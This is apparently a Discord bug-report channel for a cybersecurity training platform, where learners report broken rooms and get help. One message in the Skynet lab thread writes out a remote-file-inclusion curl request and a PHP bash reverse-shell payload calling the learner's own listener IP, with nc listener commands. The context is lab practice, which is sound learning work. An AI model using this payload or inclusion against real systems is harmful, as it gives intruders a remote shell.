#room-bugs

Which webpage?

I mean the webpage we get if we do http://<ip address of target machine>.

So just http://10.10.xxx.xxx ?

Yes

This isn't a bug.

It's intended.

Ohh. But still I am facing issues when searching directories using gobuster.

On that room, or others?

Only that particular room, Vulnversity

Other rooms are working fine for me

Yeah, as I said, that's intended.

Pay attention to the nmap scan.

Ok. So its intentional that gobuster is not working

Thanks

Is port 80 working?

Just a minute. I will start the machine and let you know after an nmap scan.

As far as I remember, it was working but I am going to check again

It doesn't

You were right, it is not working. See attached pic.

Alright, so http wont work and the site wont load . Got it. But what about gobuster ?

Ohh right, since we use http://10.10.31.132 which will be using port 80 by default, gobuster will also not function

Thanks a lot for your guidance @quaint sparrow .

Gave +1 Rep to @quaint sparrow (current: #1 - 2836)

Yup!

So you'd need to find the port the http server is working, and declare it when performing the scan

Right, gotcha. Thanks again

Room: OWASP Top 10
Task: 20 [Severity 7] Cross-site Scripting
Bug: The 3rd question about showing the machine's ip does not seem to be working.
Worked as soon as I posted about it >.>

Hello, I'm in room Shodan.io and I think the answers in Task 3's questions have changed isince the room was created

Hi I hope you are all doing well
I am making a room and uploading a windows server 2019 vm and it successfully converted but when i play the machine it gives me an error of VM: PARSING_ERROR

Hit ctrl and F5

They probably have

@quaint sparrow ok let me check

@quaint sparrow still same issue

Container hardening room task 6

MAL: Malware Introductory - Task 8

Does Virustotal report this MD5 Checksum / file Netlogo.exe as malicious? (Yay/Nay)

This is not suppose to be Yay?
I can't join screenshot but i got
"1/72 security vendor flagged this file as malicious"
"Jiangmin Backdoor.Lotok.cfq"

There are no URLs in that message.

I mean the name has backdoor in it but if the answer is nay it could just be a false positive

Bare in mind Virustotal is a live database, so it could have been nay at one point

There might be an error in the Velociraptor Room Task 5:
Question: Review the output. How many Files were Uploaded?
Answer: ||20||
But in the screenshot you can see that "Files Uploaded" is 19

My mistake that was 1/73

https://www.virustotal.com/gui/file/e86ee0e2f0aec066c3315b40f754ee25ac3c7d3db7dec20c2e82c8d9f5695536

Hi, in the room snortchallenge1, in task2, the second question its giving me wrong but im quite sure im giving the right aswer. Can somenone help me?

Forget it, My dumb mistake. Thanks anyway

In hacking with powershell the machine has an incorrectly named file (probably because of the default setting to hide file extensions). According to task 3 it should be name 'interesting-file.txt'. Instead it is named 'interesting-file.txt.txt'.

hi, in the windows fundamental 1 task 6 the last question it asks what is the account description, but when I put in "Built-in account for guest access to the computer/domain" it reads back as incoorect but it clearly says description next to the statement. can anyone help me with this issue?

Look at the * for the answer format.

The room "Security Principles" is bugged I put all the possible answers and it still says incorrect (in the 6 task)

Which question?

I have them all answered.

This ones. Which principle are you applying when you turn off an insecure server that is not critical to the business?
Your company hired a new sales representative. Which principle are they applying when they tell you to give them access only to the company products and prices?
While reading the code of an ATM, you noticed a huge chunk of code to handle unexpected situations such as network disconnection and power failure. Which principle are they applying?

I'm having a problem with the very first room and I am not sure if it's a bug or if I am jus stupid.

I keep getting a response of $NaN.00 when tranferring $2000 from 2276 acct to 8881 acct. I've tried to reload the page in the VM too with no luck.
can be ignored as suspected, I should read everything

https://tryhackme.com/jr/threatinteltools might need a revision. At the end-ish of this stream I searched for very clearly the same sha256 on Talos. The needed phrase for the answer no longer exists on the site.

https://www.twitch.tv/videos/2273530547

the results may have some randomness to them, earlier on searching for an IP. on first load the answer wasn't there. refreshed the page. and then it was.

Virustotal is a good alternative.

that's what i usually use, but question said to use Talos so i did

talos is a mess to find the right search bar to search in

Any update? Lol

There are modular sysmon logs but no clue how to combine them into a log as the powershell command Merge-Sysmon doesn't seem to do anything

Not yet.

Okay so update (also throwing in keyword Investigating Windows 3.x for future searchers w/ same issue) the procmon logs on the system are accurate and can be found in Windows Event Viewer. The log file was an unnecessary convenience

i have a problem, i start up attackbox but i does not split screen or open at all

Hi, there is a bug in the "Exploiting AD Users" room. The trevor.local explorer process never spins up. I tried running the powershell script stated and also tried restarting the room, but nothing works. Can anyone help?

Is anyone else having issues with the room 'OWASP Top 10' getting the Target Machine to display??? It starts the machine but doesn't display the split screen and I have tried different rooms and don't have any issues getting the Target Machine to display/work.

You need to use the IP

Forgive me ignorance... I am new to this. But could you be a little more specific about the IP Address. What do I do with it.

Depends on what you're doing

The tasks tell you to browse to it,.so just stick in the URL bar of a browser.

Hello, in the "OSI Model" room im having an issue with task 6, layer 5 - Session, its showing that i got the correct answers for this task, but the room progress is still at 93%. I've tried refreshing the website but all it does is reset only the questions on task 6 everything else is fine. i can also send a screenshot of my screen if that helps, thanks.

Hi All,
I have been doing all K8s-related rooms lately and there is an old one called the "Island of orchestration" where the port 80 is closed. I don't think that's intentional and I did wait around 10 minutes for the VM to boot.

Can you leave and rejoin?

Yes, i'll try that now

Just left the room and rejoined, also reset the progress on the room. going to redo it now and see if that works

It worked, thank you for taking time to assist with this i appreciate it

Thanks for asking, had the same issue. resetting progress and leaving the room worked.

Gave +1 Rep to @upper void (current: #2265 - 1)

i need help
What is the version of the running server (on port 80 of the VM)?
Ans:-2.4.10
but isn't work .

You need to connect to the port.

Have you booted up the correct machine?

I try it but all is it same output.
telnet 10.10.217.40 80
Trying 10.10.217.40...
Connected to 10.10.217.40.
Escape character is '^]'.
Connection closed by foreign host.

Does it close straight away?

yap

Terminate the machine and re-deploy.

I do it but don't work.

Hi all,
It's my first contribution so apologies if not the right spot. I seem to have an issue at the moment with some rooms. When I scan using nmap, I can only find 1 port to be open while the expected answer is 5. Any one noticed this type of issue? It's on the Network Services room or the furthernmap room.

Are you just using nmap $Targetip ?

No, for example : nmap -p1-5000 -sS 10.10.145.133 -vv -Pn

So there might be ports beyond 5000

But the question is : "Perform a TCP SYN scan on the first 5000 ports of the target -- how many ports are shown to be open?"

Hi, OSI Model room task 6 is complete but the platform leaves it incomplete. Does it happen to anyone else?

Can you link the room?

Leave the room via options, and re-join.

Solved. Thank u!

i can't finish this room because one of task freez with my answers https://tryhackme.com/r/room/osimodelzi i tried and full reset....

Leave the room and re-join via options

thanks

same here, on the exact "session" task,how i re-join via "options"? I have already closed the website and opened it again and it is still not work.

Options from the room.

Along from start attack box

Gave +1 Rep to @quaint sparrow (current: #1 - 2868)

It works! thanks!

Hello
In the Module Dissecting PE Headers, the pe-tree has very long to load, i think there is an issue

I'm getting a Uh-no! Failed to start the network on wreath and I was wondering if it was an issue on my side

hmm, well I say Scrubz message on leaving the room and rejoining for someone elses question and that seems to have worked

hello

i got a bug from OSI model

Appreciate this

Which bug specificially?

hey guys i need help

guys i think there is a mistake in introductry to network room specifacly task number 8 (Where is the very first place your computer would look to find the IP address of a domain?) this question answer is supposed to be local cache but it wouldnt take it as a right answer (help !)

"What is the result of the binary operation: 1011 NAND 1100? Include leading zeroes." under task 4 Binary Operations in the room Win64assembly, when i include 00 as padding because it asks for the leading 0s it says it is wrong, if i remove them and make it 0111 It says its right. Or Is it just a clairifaction to include 0 if your answer has it infront

READ THE TEXT IN THE TASK AND DON'T BLINDLY COPY FROM FLAG DUMPS OR WRITEUPS

Is it where you're not able to mark Task 6 in the room https://tryhackme.com/r/room/osimodelzi complete?

I'm entering the correct answers for 'What is the name of this layer?' and 'What is the technical term for when a connection is succesfully established?' but, when refreshing the room, it's showing that I never answered the questions?

upon refreshing.... reverts to that I didn't answer the question

This is quite annoying as it's showing on my learning path that I still have content to do.

Actually- just saw the same issue in the #pre-security-legacy-path room... if you leave the room and then rejoin, it will accept the answer 🙏

I have the exact same problem.

Just leave the room, rejoin and input the answer again 🙂

That worked. Thansk!

did it . didn't work

the phrase local cache does not even appear anywhere in the room text so it is a tale tell sign that you are just reading a writeup instead of the room text

so what is the asnwer supposed to be then ?

what how bro hydra room btw

nvm

we are not intended to just give you the answer... read the task text

Hi guys

I am having an issue for the room "Introductory Networking " in the cyber fundamentals learning path. For task 8 the third last question the answer is "local cache " but when I try to input it, it does not work. Any ideas>

Could I invite you to read the conversation literally about 10 messages above you please? 🙂

That is not the correct answer.

ugh

the outdated libc(s). :/

makes me sad

Hi! I have the same problem :/

Hey! Simply leave the room and rejoin it- it'll fix. 🙂

Yup! I have read that now! Thanks ❤️

I wanted to report a bug I encountered while playing the Backtrack CTF. During host enumeration, I discovered that it’s possible to access another machine in a different module, even when that machine is not running. After performing some pivoting, I was able to connect to and play another CTF from a different machine, which should not be possible.

This issue seems to bypass the intended isolation between modules and machines, allowing access to inactive systems and potentially compromising the integrity of the game flow.

Some bounty? 🤣

Hello!

In "Network Fundamentals - OSI Model Room", the activity at Task 6( Layer 5 - Session) is Buged!

It doesn't complete it. I have already carried out the activity several times.

I landed in " Intro to Offensive Security" on the task with FakeBank

This isn't a bug, it just means somebody has that IP for a machine.

Machines you boot up, aren't only exclusive to you.

oh ok then

OH FINALLY THE OSI MODEL IS "session "answer WORKING

And I still have no clue about the networking task answer

The answer is in both bold and italics

Bro

your actually a life saver

thank you so much

I wrote the room lmao

...........

Bro how comes when I go google the same question the answer says local cache

whats up with ur room man has it got changing answers or sommething 😭😭😭

The local cache is the first part of DNS, but it's not technically the first place that your computer looks

And yes, the answer was updated for accuracy a few months ago, which is why the writeups are all wrong

... which is why you should probably read the task content rather than reaching for the cheatsheets

Muiri is getting smarter and smarter.

Gonna start changing answers randomly, just to mess with the answer dumps

😭 don't do that Muiri.

btw OSED when?

Hey, I've completed 99% of the Pre-Security path. but there is a problem with "Pre Security - Network Fundamentals - OSI Model" Task 6 "Layer 5 - Sessions". both answers I give it get accepted, but aren't saved so I can not complete the path. can anybody look into it? I've seen you guys messaging about it and thought it was fixed. but unfortunately it's not :/

nevermind. found the fix in the pinned messages here #site-support message

Guys I'm experiencing some connection problems while accessing Game Zone, and hackpark on my kali machine and via VPN the websites don't load even on windows as main machine, also nmap doesn't scan the open ports even via AttackBox I'm getting those error messages "thmVNC encountered an error:

Failed to read a named property 'origin' from 'Location': Blocked a frame with origin "https://vnc.tryhackme.tech" from accessing a cross-origin frame.
SecurityError: Failed to read a named property 'origin' from 'Location': Blocked a frame with origin "https://vnc.tryhackme.tech" from accessing a cross-origin frame.
at new bp (chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js:167:64498)
at 52761 (chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js:167:69289)
at r (chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js:172:10308)
at chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js:172:10990
at chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js:172:11000
at chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js:172:11004"

In the access page it shows that I'm connected, 10.10.10.10 doesn't ping and http://10.10.10.10 partially opens

I'm using the EU-VIP-2 server

The assigned IP is: 10.14.90.201

guys help there is a bug like always on the machines
i use this command :

Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
but it wouldnt open the window UI as it says :

This will open a window where you can add thmuser2 and assign it full privileges to connect to WinRM:
OUTPUT :

PS C:\flags> set-PSSessionConfiguration -Name Microsoft.PowerShell -ShowSecurityDescriptorUI
WARNING: Set-PSSessionConfiguration may need to restart the WinRM service if a configuration using this
name has recently been unregistered, certain system data structures may still be cached. In that case, a
restart of WinRM may be required.
All WinRM sessions connected to Windows PowerShell session configurations, such as Microsoft.PowerShell
and session configurations that are created with the Register-PSSessionConfiguration cmdlet, are
disconnected.

WSManConfig:
Microsoft.WSMan.Management\WSMan::localhost\Plugin\microsoft.powershell\InitializationParameters

ParamName ParamValue

assemblyname -
pssessionconfigurationtypename showSecurityDescr...

PS C:\flags>
i tried :

Restart-Service WinRM

Does someone know about the Bug in the Room OSI Model in Task 6? You can answer the Questions but everytime you reload the page the Task is uncompleted again... That basically means the room wont be completed, unless you completing it in one rush.

Leave and rejoin the room and when you answer it will work

Yes, I have that problem, too. I am only here because of that. After being off for a while I subscribed to premium again just to find a bug immediately...

Bugs happen, this one is dealt with, it just needs user interaction

I recently started exploring THM
while solving this challenge I am stuck: https://tryhackme.com/r/room/summit
I am not able to get the fifth flag (sample5.exe)
I tried to use to create sigma rule for the network connections in most of the possible ways based on the network traffic provided in the sandbox simulation but it's not getting resolved
It says ("ip address is incorrect. Attacker has evolved") I tried using 'Any' also still not result
can anyone help me with that?
I am stuck at that one flag for a very long time

i just did this today so it's fresh on my mind. you need to explore the sigma rules more. in the log given, ||the numerous attempts with the same size data at the same 1800 second intervals are connections to a command & control server||

but also #room-help not #room-bugs

hey thanks for responding to me I tried with the repeating ip address as it is sending 97 bytes repetitively .
but I am getting prompt as ip address is not correct I tried using 'Any' also but still its not working
I used 51.102.10.19 this ip address

Gave +1 Rep to @stable folio (current: #784 - 5)

Sorry, what do you mean? Of course bugs happen, no problem. But do you consider this fixed? Actually both questions answered successfully again today but the task will not complete and thus the whole path will not be completed.

Yes, you leave the room with options and rejoin.

There has been a question removed from the room, so task 5 used to have 3 questions, now it has 2, so the task doesn't think you've completed it

Yeah I just figured from the video that there have been 3 questions before. Leaving the room and rejoining did fix it. Thank you.

Gave +1 Rep to @quaint sparrow (current: #1 - 2876)

That's what I meant with user interaction. 🙂

https://tryhackme.com/r/room/opencti
im having a problem in this room
im putting in the ip to get to the opencti but it keeps saying unable to connect

This machinw takes about 20 mins to start

https://tryhackme.com/r/room/hackpark

privilege escalation is impossible in this room simply because I've been trying to get a reverse shell with msfvenom payload for 2 days now and no connection ever comes back. (task 4)

Hi here
I am working on Snort Challenge - The Basics room

And when I trying to answer to this question "What is the destination address of packet 63?"
My Answer: 145.254.160.237
That says that I am wrong. But that is defenitly right answer

Hi, in the Network Fundamentals module, within the OSI Model room, even though the system acknowledges my correct answers, it still stays red and I cannot complete the path hence. I have even tried to reset the room, but the same part stayed red still:

Check pins in #site-support

Hello, in the room https://tryhackme.com/r/room/nmap02 (Nmap Basic Port Scans), in Task 5, when you try to complete the task using the command nmap -sS <ip>, the required ports does not show up in the attackbox

i have screenshots if needed. I had to look up Google to solve this room as i didn't want to be stuck but even when i followed all instruction from the guide, still me results looked different, Thank You.

the service takes a while to start up on that target machine if shadow recalls correctly

let it run for 15 to 20 mins then rerun the scan

my machine's been running for an hour now cause, my machine is going to terminate in 30m from now, and still the result is same

Guys Deos any one experiencing a bug in SKYNET while uploading the reverse-shell I used that command curl http://10.10.136.60/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.90.201:8000/rshell.php
and Opened a python3 web server via python3 -m http.server, my reverse shell is <?php
/**

• Plugin Name: Wordpress Reverse Shell
• Author: azkrath
  */
  exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.14.90.201/4444 0>&1’”)
  ?>
  and tried also too many reverse shells (For example from pentestmonkey, when I execute the Curl command the rshell.php gets uploaded and executed but at the same time I'm getting that <script>
  function CloseDefaultAlert(){
  SetAlert(false, "", "#alert");
  setTimeout(function () {SetBlockade(false)}, 200);
  }
  function ShowAlert(){
  _width = '';
  _height = '';
  jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
  function CompleteAnimation(){
  jQuery("#btnClose_alert").css('visibility', "visible");
  jQuery("#description_alert").css('visibility', "visible");
  jQuery("#content_alert").css('visibility', "visible");
  }
  }
  </script>
  <div class="alert_config_field" id="alert" style="z-index:;">
  <div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
  <div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
  <div class="separator" style="margin-bottom:15px;"></div>
  <div id="content_alert" class="content_alert">

on my terminal and no reverse shell

What does your listener command look like?

nc -lvnp 9001

then changed to nc -lvnp 4444

Have you tried the pentestmonkey reverse shell payload?

yup

I tried with listen port of 9001

then that one I sent with 4444

Challenge Scenario "Friday Overtime" (https://tryhackme.com/r/room/fridayovertime):

Question 7 - What is the SHA1 hash of the spyagent family spyware hosted on the same IP targeting Android devices on November 16, 2022?
(Bug-Report is based on the assumption that it is intended to retrieve the information from VT)
The Question is misleading. Due to recent scans at VT of the IP, the date in question isnt listed anymore.
Ill suggest making a commend at VT with the details or remove the Date from the Question
VT:|| https://www.virustotal.com/gui/ip-address/122.10.90.12/relations||

Meanwhile I was king in https://tryhackme.com/games/koth/110467 in some minutes that I was king it didn't give me the points. I think this is a bug.

I am currently working on the relevant room. But suddenly my machine stopped responding. I did not let the time run out. I tried to re-deploy the machine but when i want to terminate the instance the site gives me an error: Error terminating instances. I am guessing i might have just somehow bugged out the machine but is there anything i can do to restart/re-deploy it other than waiting the remaining 1 1/2 hours?

Hey please respect our policy on AI generated messages https://tryhackme.notion.site/Use-of-ChatGPT-and-AI-in-the-Discord-Server-cf01f31b7a274784a75b15b929fd8c27

This is an issue on the website, AI will not be able to provide a solution here 🙂

Sorry to learn that this is against the room rules

sudo nmap -sC -p53 10.10.124.252
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-21 07:18 EDT
Nmap scan report for 10.10.124.252
Host is up (0.096s latency).

PORT STATE SERVICE
53/tcp closed domain

Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds

Launch the AttackBox if you haven't already. After you ensure you have terminated the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC against 10.10.124.252. You will notice that there is a service listening on port 53. What is its full version value?

I need help in this problem...

first ensure the machine is up

then run sudo nmap -sC -sV -p53 10.10.124.252

Yes is it up.

are you using attack box

no openvpn

ok try agian

and see if it works now

sudo nmap -sC -sV -p53 10.10.60.18
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-21 07:47 EDT
Nmap scan report for 10.10.60.18
Host is up (0.096s latency).

PORT STATE SERVICE VERSION
53/tcp closed domain

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds

NO it same problem

which room

Nmap Post Port Scans
Task 4
Nmap Scripting Engine (NSE)

i havent completed this yet

so i dont know about the problem much

sorry!

What’s the problem

.

Why is the wreath network not working, not even starting up?

I reset it a couple of days back because it was not responding correctly but now it's not even starting

https://tryhackme.com/r/room/networkingconcepts not really a bug but the task 2 will accept wrong answers due to the leniency allowed for slight errors (i'm guessing it's looking for something 90% similarish) so layer x would be a valid answer for all

Yes, answer tolerance is kicking in.

https://tryhackme.com/r/room/javascriptessentials
task 5 q1 In the file invoice.html, how many times does the code show the alert Hacked?
takes 3 as answer but the actual should be 5

for (let i = 0; i < 5; i++) {
            alert("Hacked");
        }

the current answer seem to take the answer from the task description excerpt but the actual question asks for the invoice.html file

something seems off here 😄 https://tryhackme.com/r/room/javascriptessentials

yeah should be 5 they just used the answer from the example in task description

There are multiple bugs in the Caldera room (mainly due to Sigma rules having different names than when the room was created). There are too many to name them all; would be good for a THM staff to review this room and update accordingly. Or THM can give me edit permissions and I'll do it 😄
https://tryhackme.com/r/room/caldera

Also shout out and thank you to @idle comet - his video walkthrough has the correct Sigma rules for the room. If you do it now, the Sigma rules have different names and will not work for those answers

Gave +1 Rep to @idle comet (current: #213 - 30)

i think this is odd CAPA: The Basics
https://tryhackme.com/r/room/capabasics
asking for TLN in T6 Q3 but the acutal answer is the Capability...

This Room May Have Bug!!
Lab (Web) Isn't Working As Expected!!
Port 8080,8081,8082 Down And Port 80 Returns Error!!

The room "Nmap: The Basics" has a wrong question answer

How many TCP ports are open on the target system at MACHINE_IP?
[6]

right answer: 2

Yes, I had to guess that one

https://tryhackme.com/r/room/johntheripperbasics

||HASH4||.txt hash is too long for hash identification from python script - shows up on crackerbox with proper identification

https://tryhackme.com/r/room/kenobi

open ports are 11, but 7 in the default 1000 - answer on page is 7

i'm stumped here too can't make sense of what they're asking

Yes that was one of the issues I also saw

My reply is below it lol

In the room "Windows Fundamentals 1" task 4, I am required to input what other icon is visible in the Notification Area, but the icon in the windows VM seems to be blank. Nothing happens if I click on it. The expected answer has two 6-letter words, but i cant figure out what it is...

I am also stuck here and have no idea what could possibly be the answer here. I've tried checking against input lengths and comparing to other TLNs and it is not showing out

In the new room: https://tryhackme.com/r/room/networkingconcepts

The OSI task (2). The questions require you to answer with the correct layer. However, it does not matter whether you answer wrong or correct. As long as you answer is layer X it does not matter what number you put for X the answer is always marked as correct. I even tried with layer 9 and it was correct (then changed to the correct answer automatically).

May be intended, but if not its seems to be a bug.

It's answer tolerance

Yes i understand, but this kind of answer tolerance makes the questions useless, right?

Yes and no

Remember THM, and this path, is aimed at newcomers.

AFAIK answer tolerance can be on or off, it can't be set for rooms individually.

I was just coming to say this. You can literally just type "layer" and it will correct it for you.

To be fair though, it is a beginner room, and the answers are all right there. So it doesn't really matter all that much. Just found it funny.

can anyone help me

What involves simulating a hacker's actions to find vulnerabilities and gain unauthorized access?

I can't answer this first question

Hey am a beginner in cyber security and am currently doing windows fundamentals 1(under presecurity),task 6 and the input length for the last question is shorter than the required answer............i do not know if this is where i can get help ,but i will leave it here . Thanks in advance.

hello i can not reach any domain from gobuster room i tried to config the dns 100 times

yea same here goes on and off

Hey i have a problem using wireshark it doesn't capture the http and telnet trafic of my target

Even if i open it with sudo and using the correct interface i used any interface too but nothing worked

Hey all, The room "CAPA: The Basics" - Task6- Question 3 is now fixed. Thanks for reporting it. 👏

Hi @limber narwhal. Sorry to hear you are experiencing difficulties. Let's make sure you can continue with the room! Are you using the Attackbox or your own VM with VPN connection?

friendly reminder that this is still an open Bug 🙂

https://tryhackme.com/r/room/cicdandbuildsecurity

Hi, the room is still broken for me.

Yesterday was ok. Went back to it today and it is broken. Already reseted the network.

Both with external VM or with AttackBox, the machines are not accessible (ping fails, and browser access to the GitLab link times out), even after the setup is all done.

Any idea? Or anyone with same problem?

so it's not only me. I retried the scan a lot of time. At last I did try and error

https://tryhackme.com/r/room/cryptographybasics

Knowing that XRPCTCRGNEI was encrypted using Caesar Cipher, what is the original plaintext?

Task 4
Historical Ciphers

There is a problem with this answer sir

What problem? It's solvable

Sir I solved it but

the room says it is wrong

I am sure the answer

also I give the questions to GPT

ChatGPT says my answer is correct

but

....

Lets switch to: https://discord.com/channels/521382216299839518/522158539129618453

It's been fixed

https://tryhackme.com/r/room/shellsoverview

Task 6 - Python Reverse Shell Using the subprocess Module
An IP-address is written instead of ATTACKER_IP in "terminal"

there are many shifts of ceasar

have a bug to report

on Monicker room

for the attacker IP says line 12 but it's not line 12 the one to change. It's line 17.

In the Network Services room I am getting "WARNING: The "syslog" option is deprecated" on task 4 after using Anonymous as the username. Is this happening to anyone else?

Yes. It's not a problem.

I’m not able to continue with the room. I keep having to reset my command line. This is normal? I’m completely new lol

#room-help

Hey,

inside Cyber Sec 101 > JavaScript Essentials > Task 5 > In the file invoice.html, how many times does the code show the alert Hacked?

The Code is

for (let i = 0; i < 5; i++) {
    alert("Hacked");
}

So 5.

The Answer to the room is "3" which shouldn't be correct unless I'm missing something absolutely obvious

Known bug they seem to have used the answer from task description instead of invoice.html file

The room: Shells Overview(https://tryhackme.com/r/room/shellsoverview)
references two different VMs:
1.ShellOverview-Demo-v1
2. ShellOverview-Practical-Task-v5

The second VM is the one needed for the task. Is there any reason for the first VM to be present? I think it should be removed from the task to avoid confusion.

One is a demo that lets you use the python http.server functionality and explore (Demo) and the other one is specific for the Task needed at Task 8

I found a bug in https://tryhackme.com/r/room/networkingconcepts

who should i message for that? its a auto-complete/grammar fix bug 😛

If you just Type 'Layer x' it will autocorrect to the right answer

It's not a bug. its an intended feature called "Answer Tolerance".

its bad imo, people who enter the wrong answer get shown that its correct, and so they dont even notice that the answer they actually entered is wrong

it just misinforms them

I get that, but for this room that means you just have to answer 'layer' to all the questions and you'll have them all correct 🥲

So maybe disable it for that part of the room

Remember this path, and website is aimed at new people.

It's a good thing, people could.it wrong once or twice and then just brute force.

What is the command for Windows Troubleshooting?

hello🫤

is this a bug of this room? I'm giving the correct answer of question 4 but it's showing wrong and wrong . Again & again!

Thats not the right answer ;)

I checked! It's the right answer!

Do the stars have any spaces between them when you remove the words?

Also gave the long description message given in the description box. but nothing works !

I also tried that way you are saying.

Its not the answer I have here

🙂

Its definitely not a room bug though ;) The answer you have just isnt correct, keep trying!! c:

ok!! But I'm pretty sure the answer is correct ! Also checked write ups for that ! Every write ups also have same answer like mine. :3

Its windows funadamentals 1 right?

yep

I think you need to dig a little deeper c:

ok tryin!

Goodluck!

gotcha!
thanks!

Gave +1 Rep to @native hull (current: #1530 - 2)

I'm pretty usure this is a bug
CyberChef the basics (https://tryhackme.com/r/room/cyberchefbasics) accepts non-encoded url in Task 5, question 5

and Task 6, question 3 has this problem but reversed

Pretty sure the answer to this question could easily be interpreted as Layer 5, but tryhackme is recognizing the right answer as layer 4. Even asked chat gpt to see if im crazy and it originally said layer 5 as well. I def understand why layer 4 is considered correct, but the wording could be a bit better - "Which layer is responsible for connecting one application to another" This was from Task 2 in networking concepts room, particularly because the task explains layer 4 as "enabling" end to end communication and layer 5 as "establishing" communication between applications

grammatical error if that counts as a bug

Like you, I thought it was asking for the description of the guest account. Actually, it's asking for the description of the tryhackme account.

In my view this is a bug: the question is very vague and can be fixed quite easily: change "what is the account description" to "what is the account description for the tryhackme account?"

Sentence error in Linuxshell room
https://tryhackme.com/r/room/linuxshells
Task 4 -> Conditional Statements
The fi is used to end the for loop.

i dont think so

if thats shelll scripting

they use fi for stuff

"echo "Please enter your name first:"
read name
if [ "$name" = "Stewart" ]; then
echo "Welcome Stewart! Here is the secret: THM_Script"
else
echo "Sorry! You are not authorized to access the secret."
fi"

so fi is correct there

Room: Hashing basics, task 6. I cant use hashcat on the VM in the module because it keeps quiting because the lack of memory.

Use John, or hashcat on your localhost.

Thanks, did that eventually 🙂

Gave +1 Rep to @grizzled burrow (current: #374 - 14)

What fi is used for is the question?
Is fi used to end the loop?

That's why I mentioned the fi is not use to end the loop.
The sentence mentioned over there in the code block above is incorrect.

oh yeah, it should be more like "the fi is used to close the conditionals"

or similar

This i wanted to point out.

🙂

I misread what you meant originally, yep in context it would be better written as the fi is closing the conditional loop structure, or it ends the conditionals or something

as there is no technical for loop going on in that code

Yeah, we can say that it's a typo which can be corrected.

Good day,

regarding room https://tryhackme.com/r/room/offensivesecurityintro the machine start seems buggy and cannot be started if a question in task 2 isn't answered.

How to reproduce:

• Reset progress.
• Answer first Question in Task 1
• Task 2 Start Machine is now greyed out (refresh beforehand might be needed)
• Mark Question 2 or 3 as completed.
• Refresh site and now it works.

Which means, everyone who did only Task 1 and then came back to that site, will most likely not be able to do that room as we encountered here: #room-help message and #room-help message

Smool PoC

The answer of the Task 1 is Penetration Testing but the system is saying Incorrect answer.

your answer is incorrect. If you wanna cheat, check the video above, otherwise feel free to ask in #room-help for further detail

Great. Done. Thanks. It's seems very difficult to learn. I have spent 3 hrs for this one single troubleshoot

Gave +1 Rep to @grizzled burrow (current: #240 - 25)

That room seems the only one with the issue, at least from what I've seen from reports. It will get easier (website wise) from now on

I'm hopeful then. Thanks for your patience

Gave +1 Rep to @grizzled burrow (current: #230 - 27)

@blazing phoenix apologies for the ping. I've seen several people now over night affected by this. Wanted to ping to escalate it a bit

Please don't ping staff.

+1

hey, thanks for flagging and the repro steps, I tried however to reproduce but I can't. Out of a few accounts I tested with, 1 account had the issue. I saw that if I answered a question in the task the start button appeared again. Good spot.

Gave +1 Rep to @grizzled burrow (current: #211 - 31)

👋 Looks like a bug in https://tryhackme.com/r/room/cyberchefbasics) T5,Q5:
Either the hint is wrong, or the answer pattern is wrong.

We reverted some change we did on the logic for that room. If you’re able, could you check if you can still reproduce?

I think the task 4, question 1 : Which type of JavaScript integration places the code directly within the HTML document? is borken :
https://tryhackme.com/r/room/javascriptessentials)

What did you put as the answer?

In the room javascript essential, first question from Abusing Dialog Functions, it asks "how many time appears the dialog Hacked'

The answer is ||3|| but it is false it appears 5 times:

Seems resolved, thanks a lot!

Gave +1 Rep to @wraith obsidian (current: #1157 - 3)

Room Networking Concepts is buggy. By Task 2 you can write Layer 1 by all and its count as right. Its even Change your answer to the right one.

Room gobuster the basic, a little error:

Reporting what I think is an error with Task 9 of the webapplicationbasics room in the new path. I think this should say MIME type and not time.

Web Enumeration 3.2. Nikto Practical (Deploy #3) Apache/2.4.29 installed but it was wrong. I had to watch a Video and he had 2.4.7

idk if i did something wrong or it isnt updated. Let me know when u figured it out im pretty new

In /r/room/hashingbasics the hashcat complains there isn't enough device memory when attempting to use it (such as hashcat -m 1800 hash3.txt /usr/share/wordlists/rockyou.txt)

I used scp to download hashes and a list and ran it locally to complete the task. But there aren't steps to do that, so perhaps add those?

In the last section of the room, there is a broken link to https://tryhackme.com/r/room/johntheripper0
Its johntheripperbasics!

I'm not sure why, but after downloading the file from Task 5 in CyberChef Basics, it redirected me to a 404 page (I downloaded correctly the file)
https://tryhackme.com/r/room/cyberchefbasics

For the room "Threat Intelligence Tools" Task 5 doesn't show up correctly anymore on Cisco Talos

https://tryhackme.com/r/room/threatinteltools

It is supposed to be ||HIDDENEXT/Worm.Gen||

But it doesn't appear on the SHA256 lookup from Cisco Talos

Introductory Networking in Task 8
Networking Tools Dig i fied a bugs

Q - Where is the very first place your computer would look to find the IP address of a domain?

https://tryhackme.com/r/room/introtonetworking

The supposed answer [Local Cache]

The answer is not local cahce, this isn't a bug,

Local Cache OR local cahce

Neither, please read the taks text.

https://tryhackme.com/r/room/javascriptessentials In the file invoice.html, how many times does the code show the alert Hacked? the answer should be 5.

Hashing Basics, task 8
https://tryhackme.com/r/room/hashingbasics
To continue with this module, join John the Ripper...
The John the Ripper link leads to https://tryhackme.com/r/room/johntheripper0 which isn't available. The only John room I found is https://tryhackme.com/r/room/johntheripperbasics

I'm having a problem with the room "Linux Privilege Escalation".

I'm stuck on the task 11, I already followed all the steps trying to get root access exploiting the NFS vulnerability.

